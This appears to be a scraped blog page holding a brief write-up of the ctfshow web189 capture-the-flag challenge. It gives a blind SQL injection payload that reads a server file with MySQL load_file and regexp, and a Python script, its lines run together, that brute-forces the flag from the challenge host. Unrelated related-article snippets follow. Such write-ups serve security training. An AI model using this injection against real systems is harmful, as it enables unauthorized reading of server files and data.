select pass from ctfshow_user where username = if(load_file('/var/www/html/api/index.php')regexp('ctfshow'),0,1)
username = 0 返回密码错误,说明存在该用户
username = 1 返回查询失败


import requests
import sys
flag="ctfshow{"
url="http://9402b96a-bff0-480e-8e33-86347958c901.chall.ctf.show:8080/api/index.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz-{}"
for i in range(100):for j in letter:data={'username':"if(load_file('/var/www/html/api/index.php')regexp('{}'),0,1)".format(flag+j),'password':0}res=requests.post(url=url,data=data).textprint(res)if r"\u5bc6\u7801\u9519\u8bef" in res: flag+=jprint(flag)break if j=="}":sys.exit()

mysql load_file在数据库注入中使用

【ctfshow】- web189相关推荐

  1. 【ctfshow】web篇-SQL注入 wp

    前言 记录web的题目wp,慢慢变强,铸剑. SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "s ...

  2. 【CTFSHOW】web入门 NodeJS

    文章目录 写在前面 web334 web335 web336 web337 web338 web339 web340 web341 web342 web343 web344 参考资料 写在前面 web ...

  3. 【CTFshow】文件包含web78-web81

    文件包含web78-web81 web78 web79 php://input伪协议 data协议 web80 php://input伪协议 日志包含绕过 web81 web82(没完全理解) web ...

  4. 【CentOS】利用Kubeadm部署Kubernetes (K8s)

    [CentOS]利用Kubeadm部署Kubernetes (K8s)[阅读时间:约10分钟] 一.概述 二.系统环境&项目介绍 1.系统环境 2.项目的任务要求 三.具体实验流程 1 系统准 ...

  5. 【Spring】框架简介

    [Spring]框架简介 Spring是什么 Spring是分层的Java SE/EE应用full-stack轻量级开源框架,以IOC(Inverse Of Control:反转控制)和AOP(Asp ...

  6. 【C#】类——里式转换

    类是由面对对象程序设计中产生的,在面向结构的程序设计例如C语言中是没有类这个概念的!C语言中有传值调用和传址调用的两种方式!在c语言中,主方法调用方法,通过传递参数等完成一些操作,其中比较常用的的数据 ...

  7. 【C#】Out与ref是干什么的?

    关于return: 1.最后没有写 return 语句的话,表示程序正常退出 2.不需要返回值时,存在return的作用 例子 void main() {return; //return退出该程序的作 ...

  8. 【软件工程】RUP与软件开发5大模型

    软件开发的5大模型 1.瀑布模型:按照人的思维一步一步的开发下去,如果需求分析得当,每个阶段顺利,结果还不错! 2.快速原型模型:后来人们发现,自己不可能一下子就把所有的需求搞清楚,总是在开发的过程中 ...

  9. 【VB】学生信息管理系统5——数据库代码

    这次学生信息管理系统在代码的理解过程中遇到了一些问题.总结如下: 1. sql server的安装过程各个步骤的意思.在安装SQL Server的时候按照网上的步骤,我觉得这个需要学完整个数据库再返回 ...

  10. 白化(预处理步骤)【转】

    白化(预处理步骤)[转] 介绍 我们已经了解了如何使用PCA降低数据维度.在一些算法中还需要一个与之相关的预处理步骤,这个预处理过程称为白化.举例来说,假设训练数据是图像,由于图像中相邻像素之间具有很 ...

最新文章

  1. 最小化安装linux CentOS-6.6后 部署fastdfs +下载地址 很干很干的干货
  2. Day 05 名人能树立好榜样吗
  3. 润飞rf1800支持解密吗_《密逃2》新一期来袭:还是你期待的样子吗?
  4. why settype transport is not available in AG9 but works in AG3
  5. react本地储存_如何使用React和本地存储构建freeCodeCamp的配方框
  6. asp多表查询并显示_MySQL多表查询与事务
  7. 玩转keybd_event
  8. lnmp 清除mysql日志,军哥LNMP 如何关闭 Mysql 日志,并且删除 mysql-bin.0000*日志文件...
  9. 01.轮播图之四 :imageViews(2 或者 3 个imageview) 轮播
  10. android 后台运行管理,Android 后台运行白名单实现保活
  11. 如何将高程数据转成南方CASS的DAT格式
  12. Elasticsearch Refresh vs Flush
  13. 牛顿法与拟牛顿法求解比较
  14. 解决java下载文件中文文件名乱码问题(ie,谷歌,火狐)
  15. vue项目使用eslint和prettier格式化项目
  16. 自监督论文阅读笔记Reading and Writing: Discriminative and Generative Modelingfor Self-Supervised Text Recogn
  17. 计算方法-数值积分与微分
  18. 三国系列:何进为什么要斩杀十常侍?
  19. 说说如何通过双网卡,实现同时访问内外网
  20. TP 通过STMP发送Email邮件

热门文章

  1. netty系列之:真正的平等–UDT中的Rendezvous
  2. iphone日历怎么跳转日期_苹果手机日历怎么指定日期提醒?
  3. CS224d-Day 2:TensorFlow 入门
  4. win10硬盘锁怎么解除_win10系统下bitlocker给硬盘加密后怎么解锁
  5. 为何中华武术不堪一击?武学大师临终前解密搏击格斗的残酷真相
  6. CodeForces 68 A.Irrational problem(水~)
  7. 简述完整的计算机组成部分组成部分组成,简述计算机系统的组成
  8. Windows10启动缓慢的原因以及解决方法
  9. Postman启动慢一直加载解决方案
  10. Android NFC开发(二)——Android世界里的NFC所具备的条件以及使用方法